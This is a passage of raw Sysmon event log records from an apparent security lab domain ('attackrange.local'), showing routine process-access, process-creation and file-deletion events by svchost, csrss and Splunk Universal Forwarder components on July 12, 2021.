08:08:27.718{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000810526Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:08:27.702{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000810525Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:08:27.702{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000810524Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:08:27.702{0C1E0330-048F-60E8-0500-00000000D001}412528C:\Windows\system32\csrss.exe{0C1E0330-F87B-60EB-E879-00000000D001}3332C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x8000000000000000810523Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:08:27.702{0C1E0330-050B-60E8-9B00-00000000D001}10203368C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{0C1E0330-F87B-60EB-E879-00000000D001}3332C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x8000000000000000810522Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:08:27.703{0C1E0330-F87B-60EB-E879-00000000D001}3332C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe8.0.2Windows Print Monitor splunk ApplicationSplunk Inc.splunk-winprintmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{0C1E0330-048F-60E8-E703-000000000000}0x3e70SystemMD5=36D3753920C5BBCA16D12DEAD7A3A904,SHA256=EA17F69FB116CFA6ADC3CE07EBBAE3FD2CB221F25E3F7A9ADF3F15DA051831E2,IMPHASH=264D4B9546D98D77D97F569F55A0B748{0C1E0330-050B-60E8-9B00-00000000D001}1020C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000810521Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:08:27.577{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E3C2797D897E9FD4511D04CB79895C0B,SHA256=18419AEA7C9EE39585D4D7172D0B11D9F60E175F8933F50801ABF72B4781CD76,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001054932Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:08:27.173{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=FA2355B40E3C27C6005E95B448B74E75,SHA256=7692305888485F6D07B1D062A6B0BDE60611B1175C037EBA585A6C6101F775C6,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000810520Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:08:27.187{0C1E0330-F87B-60EB-E779-00000000D001}1980212C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe{0C1E0330-050B-60E8-9B00-00000000D001}1020C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+5691a5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+568cd6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56657|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56ca7|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+8f3800|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000810519Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:08:27.030{0C1E0330-050B-60E8-A000-00000000D001}35321936C:\Windows\system32\conhost.exe{0C1E0330-F87B-60EB-E779-00000000D001}1980C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000810518Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:08:27.030{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000810517Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:08:27.030{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000810516Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:08:27.030{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000810515Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:08:27.030{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000810514Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:08:27.030{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000810513Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:08:27.030{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000810512Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:08:27.030{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000810511Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:08:27.030{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000810510Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:08:27.030{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000810509Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:08:27.030{0C1E0330-048F-60E8-0500-00000000D001}412996C:\Windows\system32\csrss.exe{0C1E0330-F87B-60EB-E779-00000000D001}1980C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x8000000000000000810508Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:08:27.030{0C1E0330-050B-60E8-9B00-00000000D001}10203368C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{0C1E0330-F87B-60EB-E779-00000000D001}1980C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x8000000000000000810507Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:08:27.015{0C1E0330-F87B-60EB-E779-00000000D001}1980C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe8.0.2Registry monitorsplunk ApplicationSplunk Inc.splunk-regmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{0C1E0330-048F-60E8-E703-000000000000}0x3e70SystemMD5=91F33F605825B72EE2270559C7AB28F3,SHA256=3DF1CB71BB48B8669BD01179FD94DD8CC82F8103B08A0FACFD366E43E0C5FA42,IMPHASH=23D7D4307FBE7FA4F42B1902826D7C25{0C1E0330-050B-60E8-9B00-00000000D001}1020C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000810550Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:08:28.890{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=8775A8CD6BA8523D5DB1CEF8F398111F,SHA256=67C814316DE469620677597260C7393EBD40F4889630E843A8DF34214712EE68,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001054933Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:08:28.204{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=84607A4278C8497D68E5C049F52975C7,SHA256=942E306814DBE37D905E6DD8C17FB061E97DA1C2A92DC78FDF73907B5EB008FC,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000810549Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:08:28.593{0C1E0330-F87C-60EB-E979-00000000D001}23563808C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe{0C1E0330-050B-60E8-9B00-00000000D001}1020C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6025c5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6020f6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+59e67|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+5b88c|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+8e7d70|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000810548Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:08:28.405{0C1E0330-050B-60E8-A000-00000000D001}35321936C:\Windows\system32\conhost.exe{0C1E0330-F87C-60EB-E979-00000000D001}2356C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000810547Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:08:28.405{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000810546Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:08:28.405{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000810545Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:08:28.405{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000810544Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 